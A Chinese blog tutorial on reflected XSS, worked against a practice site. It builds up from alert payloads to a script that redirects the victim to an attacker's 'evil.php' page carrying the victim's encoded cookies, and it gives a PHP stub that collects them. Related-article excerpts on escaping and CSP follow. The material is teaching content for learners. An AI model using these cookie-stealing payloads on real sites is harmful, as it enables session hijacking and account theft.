XSS学习(一)之HTML

最新推荐文章于 2025-06-19 21:35:57 发布
最新推荐文章于 2025-06-19 21:35:57 发布
阅读量2k 收藏 4
点赞数
CC 4.0 BY-SA版权
分类专栏: Xss 文章标签: Xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Praifire/article/details/52186037
本文介绍了XSS(跨站脚本攻击)的基本概念,包括它的全称、用途和Cookies的相关知识。通过示例详细解释了URL的结构,并展示了如何通过修改URL参数进行XSS攻击,强调了'?'和'&'在传递参数中的作用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

学习网站:http://xsst.sinaapp.com/example/1-1.php

一、Xss全称是cross site scripting,即跨站脚本攻击。

二、用处:作为用来窃取信息的主要攻击方式。

三、Cookies :Cookies一词用在程序设计中是一种能够让网站服务器把少量数据储存到客户端的硬盘或内存,或是从客户端的硬盘读取数据的一种技术。从本质上讲,它可以看作是你的身份证。保存的信息片断以"名/值"对(name-value pairs)的形式储存,一个"名/值"对仅仅是一条命名的数据。

四、示例讲解:

输入网址:

http://xsst.sinapp.com/example/1-1.php?page=2
      显示结果:


注解:1. “?”后面page=2是参数;

           2.URL标准格式:协议://服务器IP [:端口] /路径/ [?查询]  比如Http协议:

HTTP URL
  格式:
  http://host[:port][abs_path]
  其中http表示要通过HTTP协议来定位网络资源。
  host表示合法的Internet主机域名或IP地址(以点分十进制格式表示);
  port用于指定一个端口号,拥有被请求资源的服务器主机监听该端口的TCP连接。
  如果port是空,则使用缺省的端口80。当服务器的端口不是80的时候,需要显式指定端口号。
  abs_path指定请求资源的URI(Uniform Resource Identifier,统一资源定位符),如果URL中没有给出abs_path,那么当它作为请求URI时,必须以“/”的形式给出。通常这个工作浏览器就帮我们完成了。

         3. “?”    分隔实际的URL和参数 。


             4.“‘?’”后面带的是get方式传递的值,如果有多个值,用 & 号分割.

然后把上面网址替换为:

http://xsst.sinapp.com/example/1-1.php?page=<img src="http://www.baidu.com/img/baidu_sylogo1.gif">
显示结果:


进一步我们把网址替换为:

http://xsst.sinapp.com/example/1-1.php?page=<script>alert(1)</script>
        显示结果: 


更深入一步,我们可以得到页面的cookies数据
page=<script>alert(document.cookie)</script>
 网址为: 
http://xsst.sinapp.com/example/1-1.php?<span style="font-family: arial, 宋体, sans-serif, tahoma, "Microsoft YaHei";">page=<script>alert(document.cookie)</script></span>

显示结果为:


当然这个只是弹出cookies,只是好看而已。(弹窗一点不好看 T T,没妹子好看!)

我们的目标是将得到的cookies发送到另外一个网站。试试下面的

page=<script>location.href='http://你自己的网站/evil.php?cookie='+encodeURIComponent(document.cookie)</script>

或点以下我所提供的链接(IE8,IE9用户,而且没关XSS筛选器的)
如果输入以下网址: 

http://xsst.sinapp.com/example/1-1.php?page=<script>location.href='http://xsst.sinaapp.com/example/evil.php?cookie='+encodeURIComponent(document.cookie)</script>

输出结果为:


注解:

考虑到一些新手,没有JS基础,附上面这段JS代码的解释:
location.href="恶意地址"; //这句话可以让当前页面(location)的地址(href),跳转到恶意地址
document.cookie //就是当前页面的cookies数据
encodeURIComponent(document.cookie) //就是将cookies数据编码一下(防止cookies中有特殊的符号,导致地址错误)
location.href="恶意地址"+encodeURIComponent(document.cookie) //就是将编码后的数据加在恶意地址之后

例如:
location.href='http://xsst.sinaapp.com/evil.php?cookie='+encodeURIComponent(document.cookie)

运行之后,将会跳转到 http://xsst.sinaapp.com/evil.php?cookie=编码后的COOKIES数据

我们在服务器端,只需要用以下PHP代码,就可以获得cookie数据

<?
   $cookie=$_GET["cookie"];
   存储($cookie); //此句是伪代码
?>


【前端开发必知】HTML特殊字符转义及编码
等风来
08-25 1万+
HTML 中,有些特殊字符不可直接使用,需要使用转义字符或实体编码来表示。这是为了避免这些字符与 HTML 标签和语法产生冲突。同时,也是为了防范前端XSS。 例如,有些特殊字符(如 < 和 >)作为HTML标签的部分,要是没有被特殊处理可能被恶意XSSHTML的特殊字符转义及编码在防范跨站脚本攻击(Cross-Site Scripting, XSS)方面起到关键作用。XSS种常见的安全漏洞,攻击者通过在受信任网站上插入恶意脚本,使其在用户浏览器中执行。
xss攻击 html代码,常见的XSS攻击代码
weixin_35671110的博客
06-07 2189
类:在html标签事件中触发,典型的是on*事件,但是这种触发模式的缺陷在于不能直接触发所以更多的需要配合使用。eg:1.使html元素占据整个显示页面 2.增加属性触发事件 3.自动触发事件在真实环境中,‘ 、" 、() 都是属于黑名单中的成员,如果遇到以上四个字符被过滤的情况,那么我们就需要使用其他字符去代替,或者编码的方式去绕过。eg:1.不使用 " 2.不使用 ‘ 3.不使用...
XSS HTMLFILTER
10-07
你还在为防范xss注入攻击而头疼吗,开源的XSS HTMLFILTER工具类能帮你过滤表单或链接中敏感的js html字符,有完整的源代码和代码示例 为您的系统增添xss的第道防护
xsshtml标签,可以被XSS利用的HTML标签和些手段技巧
weixin_42395725的博客
06-18 1578
XSS让我们在渗透中有无限的可能,只要你发挥你的想象。 引用位前辈总结的很贴切的句话——“XSS使整个WEB体系变得具有灵性”。网上关于XSS的教程数不胜数,转载来转载去的,就是那么些Payload,可能看的人晕晕的不知所以然。而且还有很多Payload就算把其中的HTML代码闭合后写在自己的前端中,都不定触发,因为很多老的标签和事件都已经被W3C给废弃了。本文首先给大家总结下目前通用...
HTML常见的XSS攻击有哪些
最新发布
文摘资讯
06-19 40
攻击者将恶意脚本存储在目标服务器上,例如在数据库中。每当用户访问包含恶意脚本的页面时,脚本就会执行。恶意脚本直接在客户端通过修改页面的 DOM 来执行。以下是些常见的 XSS 攻击示例,以及如何防御这些攻击的代码示例。:对所有用户输入进行验证,并在输出时进行适当的转义,以防止脚本执行。:使用成熟的库和框架,它们通常已经包含了防御 XSS 的机制。这种攻击通常发生在处理用户输入但未正确验证或转义的页面上。通过这些措施,可以有效减少 XSS 攻击的风险。:在服务器端和客户端都要对用户输入进行转义。
【安全】P 4-10 HTML事件中的XSS
Z_David_Z的博客
02-18 351
目录0x01 HTML事件介绍0x02 XSS漏洞发现0x03 闭合思路分析0x04 Payload触发XSS漏洞 0x01 HTML事件介绍 在现代浏览器中都内置有大量的事件处理器。这些处理器会监视特定的条件或用户行为,例如鼠标单击或浏览器窗口中完成加载某个图像。通过使用客户端的 JavaScript,可以将某些特定的事件处理器作为属性添加给特定的标签,并可以在事件发生时执行个或多个 JavaScript 命令或函数。 0x02 XSS漏洞发现 设置独无二字符串提交,在响应中寻找。 0x03 闭合
html注入跨站攻击脚本,跨站脚本攻击(XSS
weixin_39888180的博客
06-23 2053
跨站脚本攻击(XSS)种客户端代码注入攻击。攻击者通过在合法的网页中注入恶意代码,达到在受害者的浏览器中执行恶意代码的目的。当受害者访问执行恶意代码的网页时,攻击就开始了。这些网页成为了将恶意代码发送到用户浏览器的工具。通常受到跨站脚本攻击的网页包括论坛、留言板以及可以评论的网页。如果网页将用户的原始输入作为网页内容,那么它很容易受到 XSS 攻击,因为这类用户输入定会被受害者的浏览器解析。...
xss跨站攻击html转义,前端攻击和防御()XSS跨站脚本攻击
weixin_36011231的博客
06-21 1550
()XSS跨站脚本攻击(1)XSS简介XSS攻击全称跨站脚本攻击(Cross Site Scripting),是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤...
XSS学习大全
05-02
"XSS学习大全"压缩包可能包含了各种XSS攻击实例、漏洞分析、防御策略以及相关工具的教程。这些资料可以帮助你深入理解XSS的原理,掌握如何发现和修复此类漏洞,同时了解黑客如何利用它们进行攻击。通过学习,你将...
WEB渗透学习-XSS-labs靶场
04-20
XSS,全称为Cross-Site Scripting,是网络安全领域常见的漏洞类型之。它允许攻击者通过注入恶意脚本到Web页面中,进而对用户浏览器进行操控。XSS-labs是个专门针对XSS学习平台,为网络安全从业者和新手提供了...
XSSPlayground:个简单的学习XSS的地方
03-25
个简单的学习XSS的地方。 专为自己学习和帮助他人而设计(请使用!) 免责声明 这是项正在进行中的作品,会随着时间的推移而变化。 了解您能做到的! 更新 15/03/2021-添加了新的布局,重新设计了xss 1,2,3。 ...
HTML实体编码:XSS防御的关键策略
08-18
HTML实体编码是防御XSS攻击的关键策略之。通过将特殊字符转换为它们的HTML实体形式,可以有效地防止恶意脚本的注入和执行。然而,为了全面防御XSS攻击,开发者还需要采取多种措施,包括使用CSP、进行输入验证和...
xss-vuln学习通关总结
08-24
XSS(Cross-site scripting)是种常见的网络安全漏洞,主要表现为黑客通过注入恶意脚本到网页中,从而在用户浏览网页时控制用户的浏览器。这种攻击最初因为涉及跨域而得名,但随着JavaScript的发展和前端应用的...
web安全之XSS攻击demo
04-18
web安全之XSS攻击demo,配合我个人博客使用,谢谢各位的捧场
html双角引符编码,XSS攻击常识及常见的XSS攻击脚本汇总
weixin_39869197的博客
07-18 335
、什么是XSS?XSS全称是Cross Site Scripting即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现了不被预期的脚本指令并执行时,XSS就发生了。二、XSS分类XSS有三类:反射型XSS(非持久型)、存储型XSS(持久型)和DOM XSS1、反射型XSS发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS代码随响应内容起传回...
挖洞经验 | 可以被XSS利用的HTML标签和些手段技巧,靠挖SRC漏洞每月多赚15k
jennycisp的博客
10-26 1037
*”。**网上关于XSS的教程数不胜数,转载来转载去的,就是那么些Payload,可能看的人晕晕的不知所以然。而且还有很多Payload就算把其中的HTML代码闭合后写在自己的前端中,都不定触发,因为很多老的标签和事件都已经被W3C给废弃了。本文首先给大家总结下目前通用可以拿来构造XSSHTML标签和些标签事件,然后再给大家讲述些绕过的技巧,教你在么构造出属于你自己渗透时真正需要的Exp。
利用html编码进行xss攻击
mgxcool的专栏
06-11 7173
脆弱性测试的时候,发现了处输出没有做编码转换,但由于开启了magic_quote_gpc,导致提交的数据中,' "都被转义,最后导致输出的地方不能执行恶意js。 如下: 提交的恶意数据为 1 ',alert(123),' 因为被magic_quote_gpc转义,存储到后台的数据也是被转义的,导致输出的
HTML 清理(逃逸)对抗 XSS 攻击
allway2的博客
07-25 1322
在上面的例子中,被“”包围的“script”标签被清理了。它是HTML标签,在净化处理之前作为脚本标签运行,但在净化处理之后,“”被替换为字符串“”,因此它们显示在浏览器。通常,通常会指定“ENT_QUOTES”,它不仅会过滤“”,还会过滤“'(单引号)”和“”(双引号)。在上述函数“htmlentities”中,不仅“”,而且“”(双引号)和“&”分别被替换为不同的字符串“"我介绍了如何将“”替换为“<......
【网络安全 / 前端 XSS 防护】文带你了解 HTML 的特殊字符转义及编码
胡西风的博客
04-01 730
如果用户输入的内容未经过转义或编码处理,并且在个人简介页面上直接显示,那么攻击者可以在自我介绍中插入恶意 HTML 标签或属性。例如,当浏览器检测到页面中的特殊字符被正确转义或编码时,它们会将其视为纯文本,不会将其解析为 HTML 标签或脚本。转义时应考虑多重编码:当字符传输经过多个层级或环节时,确保在每个层级或环节上都进行了正确的编码和转义处理。这样,HTML 标签和属性不再被解析为可执行的代码,保护了页面和用户的安全。这样,URL 中的特殊字符被转义为实体编码,防止了恶意代码的执行。
xss学习
03-22
### XSS攻击原理 跨站脚本攻击(Cross-Site Scripting, XSS)是种常见的安全漏洞,允许攻击者通过注入恶意脚本来窃取用户数据或执行其他有害操作。XSS攻击的核心在于利用网页未对用户输入的内容进行充分过滤或编码,从而使得恶意脚本能够在受害者的浏览器中被执行。 #### 攻击分类 XSS攻击主要分为三种类型:存储型XSS、反射型XSS以及DOM-based XSS。 - **反射型XSS** 是指攻击者诱导受害者点击个含有恶意脚本的URL链接,服务器将此脚本嵌入到响应页面中返回给客户端,最终由浏览器解析并运行该脚本[^2]。 - **存储型XSS** 则涉及将恶意脚本保存至数据库或其他持久化存储介质中,每当有合法用户访问受影响资源时都会触发相应脚本执行。 - **DOM-based XSS** 不依赖于服务端参与,而是直接修改当前文档对象模型(Document Object Model),即通过改变JavaScript代码来实现攻击效果[^1]。 ### 防御方法 为了有效防范此类威胁,可以采取以下几种技术手段: #### 输入验证与输出编码 对于任何来自外部源的数据都应实施严格的校验机制,并采用合适的字符集转换规则以避免特殊字符被错误解释成HTML标记或者属性值的部分。例如,在展示之前应该将`<`, `>`, `"`, `'` 替换为其对应的实体形式 (`<`, `>`, `"`, `'`) 来阻止潜在危险指令序列被执行[^3]。 ```javascript function escapeHtml(unsafe) { return unsafe.replace(/[<>]/g, function (match) { switch(match){ case '<': return '<'; case '>': return '>'; } }); } console.log(escapeHtml("<script>alert('XSS')</script>")); // 输出 <script>alert('XSS')</script> ``` #### 使用CSP头增强安全性 Content Security Policy(CSP)项额外的安全层配置选项,它定义哪些动态资源可以在特定环境下加载和执行。启用后能够显著降低因意外引入第三方库而引发的风险水平。具体来说就是设置HTTP响应头部字段`Content-Security-Policy`指定可信任来源列表,拒绝切不符合条件的要求尝试。 ```apacheconf Header set Content-Security-Policy "default-src 'self'; script-src 'self' https://apis.google.com;" ``` #### HTTPOnly Cookies 和 Secure Flags 确保敏感信息如会话令牌仅限内部使用而不暴露在外网环境里非常重要。为此可以通过设定Cookie标志位HttpOnly防止JavaScript读写权限;另外如果应用支持TLS加密通信,则建议同时开启Secure flag强制要求所有传输过程均需经过SSL/TLS保护下完成。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值